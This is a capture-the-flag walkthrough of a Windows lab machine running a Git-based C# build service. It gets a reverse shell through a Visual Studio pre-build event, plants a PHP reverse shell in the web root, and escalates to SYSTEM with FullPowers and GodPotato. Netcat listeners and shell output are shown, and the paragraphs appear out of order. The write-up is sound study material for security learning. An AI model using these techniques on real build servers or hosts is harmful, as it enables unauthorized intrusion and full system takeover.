szczygielka@hacks$ nmap -sCV -p- 10.129.210.129
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-26 14:48 EST
Nmap scan report for 10.129.210.129
Host is up (0.038s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-title: Visual - Revolutionizing Visual Studio Builds
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 168.08 seconds
The Nmap output shows that only one port is open, it is port 80 with an Apache HTTP server.
Exploring website
Let's visit the website located at http://10.129.210.129/ using a web browser.
The website appears to allow the compilation of projects in C# and .NET 6.0 platforms. The description on this website suggests that when you upload a link to a Git repository, it compiles the project on the remote machine, and then returns an executable or DDL files.
Let's try to verify whether the functionality of the downloading project works. Let's run the Python HTTP server:
szczygielka@hacks$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Let's provide a link to our fake repository and click Submit button:
After pressing the button, we are redirected to the following page:
The Python HTTP server indicates that the target machine tried unsuccessfully to download the file:
Based on the test performed, we already know that this machine is actually trying to download the contents of the Git repository. Cloning the repository seems to work. Now let's test whether the ability to compile projects works. Create an actual Git repository containing a Visual Studio project in C#. Sample .NET 6.0 project we can find in this repository:
We can clone the repository by the following command:
Let's go to the .git directory contained in the solution we downloaded:
szczygielka@hacks$ cd sample-dotnet6/.git
Let's run the following command in this directory:
szczygielka@hacks$ git --bare update-server-info
Start the Python HTTP server in this directory as well:
szczygielka@hacks$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
In another terminal window we can check whether cloning the repository is working properly:
szczygielka@hacks$ git clone http://10.10.14.73
Cloning into '10.10.14.73'...
Cloning seems to be working fine. We can now upload a link to our repository and try to build the project. After providing the link to the Git repository, we can see that the files have been downloaded from the server:
The user.txt flag can be found in C:\Users\enox\Desktop.
Privilege escalation
Shell as LocalService
In the C:\ directory we find xampp:
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/5/2022 12:03 PM PerfLogs
d-r--- 6/10/2023 11:00 AM Program Files
d----- 6/10/2023 10:51 AM Program Files (x86)
d-r--- 6/10/2023 10:59 AM Users
d----- 9/19/2023 6:44 AM Windows
d----- 6/10/2023 10:32 AM xampp
XAMPP is an Apache distribution containing MariaDB, PHP, and Perl. The web root directory is located at C:/xampp/htdocs/. All files placed in this directory should be processed by the web server. Let's go to this directory. Now let's create a simple web shell to find out what permissions this web server is running with:
szczygielka@hacks$ nc -lnvp 8080
listening on [any] 8080 ...
connect to [10.10.14.73] from (UNKNOWN) [10.129.212.12] 49697
SOCKET: Shell has connected! PID: 2428
Microsoft Windows [Version 10.0.17763.4851]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs>
As we expect, we are local service user:
C:\xampp\htdocs>whoami
nt authority\local service
Let's check what permissions have been assigned to this account:
C:\xampp\htdocs>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Let's download the FullPowers.exe executable file to our attacking machine from the release page, and then run the Python server:
szczygielka@hacks$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Then, on the attacking machine, run the PowerShell console and download the file:
PS C:\xampp\htdocs> .\FullPowers.exe
[+] Started dummy thread with id 3056
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.4851]
(c) 2018 Microsoft Corporation. All rights reserved.
Enumerate our rights again:
C:\Windows\system32>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeAuditPrivilege Generate security audits Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
We recovered the default privilege set. One of the privileges we now have is SeImpersonatePrivilege. This privilege can be used to further elevate privileges to obtain access as the system user. To try to increase our rights and get a reverse shell as thesystem user, we use the GodPotato tool:
Let's download the GodPotato-NET4.exe file from the Release section to the attacking machine and then rename it:
Let's also download Netcat for Windows on the attacking machine. Netcat we will need a target machine to get the reverse shell. Then let's run the listener:
szczygielka@hacks$ nc -lnvp 9000
listening on [any] 9000 ...
szczygielka@hacks$ nc -lnvp 9000
listening on [any] 9000 ...
connect to [10.10.14.73] from (UNKNOWN) [10.129.212.12] 49766
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
After executing the whoami command, we see that we have received a reverse shell as the user system:
PS C:\xampp\htdocs> whoami
nt authority\system
Root flag
The root flag can be obtained atC:\Users\Administrator\Desktop.
PS C:\Users\Administrator\Desktop> dir
dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/28/2024 10:30 AM 34 root.txt
According to the , this command updates auxiliary info files to help dumb servers.The available on Stack Overflow indicates that as a dumb server, we can understand all servers containing Git repositories with access over HTTP and every Git repository hosted by this dump server needs to have this command. This command should be executed always after committing changes in a Git repository.
Maybe a successful project build won't be necessary. Let's see if we can somehow use the project compilation process in Visual Studio to remote code execution. From on Stack Overflow, we find out about possible attack vectors for Visual Studio, one of them is the use of pre-build events. Using this attack vector does not force us to build the project correctly because the malicious code should be executed before the project is compiled. Information found on the Internet indicates that in the case of Visual Studio projects, information about the pre-build event should be included in the project file.
From the Microsoft , we find out that when solutions are created and built-in Visual Studio, Visual Studio uses MSBuild to build each project in your solution. Every Visual Studio project includes an MSBuild project file, which is an XML document that contains all the information and instructions that MSBuild needs to build a project, like the content to include, the platform requirements, versioning information, etc., and also build events. The extension of the MSBuild project file depends on the project type, in the case of a C# project it is .csproj file. In our case project file is the file Sample.DotNet6.Api.csproj. The of building events contains examples of how to add a pre-build event to the project file. We can do this by adding the following lines of code to the Sample.DotNet6.Api.csproj file:
Let's search for payload, which should allow us to get a reverse shell. In this case, we will use payload PowerShell #3 (Base64), which can be generated . Let's add the payload to the Sample.DotNet6.Api.csproj file:
So we can get a reverse shell as a local service. We will use Ivan Sincek's PHP reverse shell from . We can prepare the revshell.php file on our attacking machine and run the Python HTTP server. First, prepare the listener on the selected port:
According to the Microsoft , the current permissions assigned to the local service account are not the default permissions for this account. To try to restore the default permissions for this account, we can use the FullPowers tool:
